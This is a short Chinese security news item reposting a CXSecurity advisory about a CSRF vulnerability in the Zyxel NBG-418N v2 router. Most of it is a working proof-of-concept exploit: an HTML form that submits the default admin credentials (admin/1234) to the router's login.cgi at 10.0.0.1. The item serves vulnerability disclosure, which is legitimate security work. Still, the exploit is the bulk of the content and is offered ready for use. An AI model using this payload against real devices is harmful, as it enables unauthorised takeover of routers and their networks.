资讯

1、Zyxel NBG-418N v2 Modem CSRF Exploit & PoC | UPDATE - CXSecurity.com

Zyxel NBG-418N v2 路由器存在 CSRF 漏洞。

  1. # Exploit Title: NBG-418N v2 Modem CSRF Exploit & PoC
  2. # Date: 28-12-2018
  3. # Exploit Author: God3err
  4. # Version: Zyxel NBG-418N v2 v1.00(AAXM.4)C0
  5. # Tested on: Windows 10 x64
  6. Exploits :
  7. ----------------------------
  8. <html><head>
  9. <title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
  10. </head><body>
  11. <form action="http://10.0.0.1/login.cgi" method="POST">
  12. <input type="text" name="username" id="username" value="admin" /><br />
  13. <input type="text" name="password" id="password" value="1234" /><br />
  14. <input id="loginBtn" onclick="return onlogin()" type='submit' value='Go!' />
  15. <input type="hidden" name="submit.htm?login.htm" value="Send">
  16. </form>
  17. </body></html>